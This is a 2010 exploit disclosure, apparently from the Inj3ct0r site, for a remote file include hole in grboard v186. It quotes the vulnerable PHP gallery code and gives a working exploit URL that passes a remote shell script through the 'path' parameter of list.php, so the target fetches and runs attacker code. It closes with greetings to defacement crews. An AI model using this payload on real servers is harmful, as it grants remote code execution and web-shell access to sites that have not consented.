grboard v186 Remote File Include Vulnerability
Posted on 30 May 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>grboard v186 Remote File Include Vulnerability</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>============================================== grboard v186 Remote File Include Vulnerability ============================================== # Author : untouch # Location : jakarta - Indonesia # Situs : antijasakom[dot]org, autosaved[dot]wordpress[dot]com # Contact : unkn0wn[dot]cr3w[at]ymail[dot]com # Script: http://sirini.net/grboard/board.php?id=grskin&articleNo=82 # Download: http://sirini.net/grboard/download.php?id=grskin&articleNo=82&num=1 ###################################################################### #<div class="latestGalleryTitle"><a href="<?php echo $grboard; ?>/board.php?id=<?php echo $id; ?>"><?php echo $latestTitle; ?></a></div> #<?php #// &#52572;&#44540;&#44068;&#47084;&#47532;&#50640; &#50416;&#51068; GD &#50040;&#45348;&#51068; &#50644;&#51652; &#48512;&#47476;&#44592; #include_once $path."/thumbnail.php"; # #// &#44172;&#49884;&#47932; &#47336;&#54532; #while($latest = mysql_fetch_array($getData)) #{ # // &#44033; &#44172;&#49884;&#47932;&#45817; &#52392;&#48512;&#54028;&#51068; &#52395;&#48264;&#51704; &#44163; &#44032;&#51256;&#50752;&#49436; &#52376;&#47532; # $target = $latest['no']; # $file = @mysql_fetch_array(mysql_query("select file_route1 from {$dbFIX}pds_save where id = '$id' and article_num = '$target'")); # ?> #<div class="latestGalleryPhoto"><a href="<?php echo $grboard; ?>/board.php?id=<?php echo $id; ?>&amp;articleNo=<?php echo $latest['no']; ?>"> #<?php echo makeLatestThumb($grboard."/".$file['file_route1'], $path, $id, $grboard, 100, 100); ?></a></div> # <?php #} # while #?> #<div class="latestGalleryClear"></div> ###################################################################### ####################################################################################################### Exploit: http://[target]/[path]/latest/sirini_gallery2_play/list.php?path=http://[shellscript] ####################################################################################################### #Special Thanks : - Gorontalo Defacer : cr4wl3r, bl4ck_3n91n3, aries.deris, Tawon Sparta - AntiJasakom Crew : Shamus, boys_rvn1609, 5ynL0rd, kqaj, dbugr, kiddies, g4pt3k - all Indogamers Admin & Moderator # Note : Don't Be Affraid to Attack Your Own Network ~ # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-05-30]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>